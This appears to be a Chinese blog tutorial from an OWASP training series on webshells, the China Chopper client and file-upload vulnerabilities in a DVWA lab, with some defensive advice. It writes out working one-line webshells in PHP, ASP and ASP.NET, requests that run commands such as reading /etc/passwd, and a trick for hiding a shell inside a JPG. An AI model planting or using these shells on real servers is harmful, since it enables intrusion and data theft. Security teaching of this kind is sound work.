2.中国菜刀使用详解(OWASP实战训练)(OWASP实战训练)
Webshell
小马:一句话木马也称为小马,即整个shell代码量只有一行,一般是系统执行函数
大马:代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵检测系统检测到
下面准备了两个脚本
(1)shell2.php #eval 使用PHP函数,例如PHPinfo
<?php eval($_REQUEST['cmd']);?>
http://192.168.0.102/dvwa/hackable/uploads/shell2.php?cmd=phpinfo();
(2)Shell3.php #system 使用Linux系统命令,列如ls,cp,rm
<?php system($_REQUEST['yangge']);?>
http://192.168.0.102/dvwa/hackable/uploads/shell2.php?yangge=cat /etc/passwd
中国菜刀
<?php @eval($_POST['chopper']);?>
说明:REQUEST是在网页端输入变量访问,POST则是使用像中国菜刀之类的工具连接,是C/S架构。
刚刚用到了webshell一句话木马,两个请求方式request和post,建议使用post方式用菜刀连接方便,request是在网页输入变量比较麻烦。
www.maicaidao.com是打不开的
脚本客户端(包括但不限于EVAL)部分
(1)要了解的
服务端只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅度提高。
目前支持的服务端脚本:PHP,ASP,ASP.NET,并且支持HTTPS安全连接的网站。
在服务端运行的代码如下:
PHP: <?php @eval($_POST['chopper']);?>
ASP: <%eval request(“pass”)%>
ASP.NET <%@_Page Language=”Jscript”%><%eval(Request.Item[“pass”],”unsafe”);%>
(注意:ASP.NET要单独一个文件或此文件也是JScript语言)
Customize:自定义类型,功能代码在服务器端保存,理论上支持所有动态脚本,只要正确与菜刀进行交互即可。
(2)怎么用
在主视图中右键/添加,在弹出的对话框中输入服务器端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码,保存后即可使用文件管理、虚拟终端、数据库管理三大模块功能,同时支持自定义的脚本执行,并可以导入导出数据。
要是其他都没有错误,那么可能就是你把语言编码选错了。
1.文件管理:【特色】缓存下载目录,并支持离线查看目录;
2.虚拟终端:【特色】人性话的设计,操作方便;(输入help查看更多用法)
3.数据库管理:【特色】图形界面,支持mysql、mssql、Oracle、infomix、access以及支持ado方式连接的数据库。
(3)关于配置信息怎么填?
数据库方面:
(3-1)PHP脚本:
<T>类型</T> #类型可为MYSQL,MSSQL,ORACLE,INFOMIX
<H>主机地址</H> #主机地址可为机器名或IP地址,如localhost
<U>数据库用户</U> #连接数据库的用户名,如root
<P>数据库密码</P> #连接数据库的密码,如12345
(3-2)ASP和ASP.NET脚本:
<T>类型</T> #类型只能填ADO
<C>ADO配置信息</C>
#ADO连接各种数据库的方式不一样,如MSSQL的配置信息为
Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456;
同时,支持NT验证登录MSSQL数据库,并能把查询的结果列表导出为HTML文件
(3-3)Customize脚本:
<T>类型</T> 类型只能填XDB
<X>与customize脚本约定的配置信息</X>
注意:我们之前使用菜刀的时候并没有填写配置的信息,值写了地址,如果过你能知道数据库配置的话就能进行数据库管理,如下
<T>MYSQL</T>
<H>localhost<H>
<U>root</U>
<P>owaspbwa</P> #这个密码按理是不知道的,我们可以通过后期的sql注入得到此密码
在文件管理可以删除文件等操作,但还是注意是普通账号。
虚拟终端
数据库管理:
有正确的数据库账号和密码就能进行数据库管理了,在配置中输入数据库账号密码(个人认为小马连接成功后,可以上传大马,这样就更加容易得到数据库密码和提权了)
这个菜刀还可以修改启动密码,不过这是好几代的版本了,我目前使用的是第一代的开源的版本有很多功能还不完全,我已经将新版菜刀下载了但还未使用过。
点击新版菜刀左上角,有网站扫描功能也就是spider爬虫,其实其他的工具也是有的,使用爬虫将网页爬取就知道别人网站中的东西的,文件结构路径。爬取后的网站有点大,可以删除。
文件上传漏洞
下面有个图片木马,放到下节课来讲。
这是文件上传的漏洞,下面会讲到文件执行的漏洞。
文件上传本身是正常的,但是开发人员并没有进行过滤,导致出现的文件上传漏洞,现在代码是以文件的形式传到网站目录下的,我们也可以将其上传到mysql去,即将代码灌倒mysql中,而不是想现在上传文件。
一旦上传以后,知道路径加上上传的密码就能连接,进行文件的管理,甚至数据库的管理。还有虚拟终端,甚至爬虫都不需要,爬虫这个东西根上传网站无关,指定任何一个网站都可以爬,爬虫是违法的。
一句话木马编写格式在帮助文档里有。
怎么防御文件上传漏洞,在高安全级别下是将文件上传的后缀限制,或者前端部署应用防火墙,waf防火墙看看我们写的代码里是否有eval post等的一些标记。同样如果过你怀疑自己的网站中招了,有木马,我们可以在中端执行一下程序进行过滤看看有没有含有此特殊标记的文件。
Root:/var/www/dvwa/# fgrep -R ‘eval($_POST[’ /var/www/dvwa
一句话木马可能在一个文件,或者被包含在一个文件。
图片木马
方法一:windows命令:
Copy yangge.jpg/b+shell.php yangge1.jpg
方法二:edjpgcom
如何应对文件上传漏洞
1,开发人员要做一些相对的限制
2,可能在我们前面有一些waf应用防火墙,防火墙有一些规则对木马进行过滤拦截,只要有人提交就会报错,我们被动防御是比较难的,通常会有waf防护墙。
阿里云上有WAF防火墙,一个waf可以搞定很多事情(如CC攻击(自己搞不定,不断的刷验证码网页,让验证码扛不住。)),大家看看CC攻击和DDoS攻击有何区别。
DDOS就是让你网站扛不住,如网站20G,但输入50G就无法提供服务了。网络被搞垮。
CC是让你的应用程序瘫痪,如刷验证码,网络没问题,应用被搞垮了。
DDOS可以通过传统的防火墙去抗,但CC不行,需要WAF(web应用防火墙)来识别,在实际如果使用了云服务器,一个是云的工程师,一个是安全的,高级的有waf配置,真的怀疑中招就搜索,现在讲的文件上传漏洞只是冰山一角,这只是纯粹的文件上传,还有sql数据库上传漏洞。
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
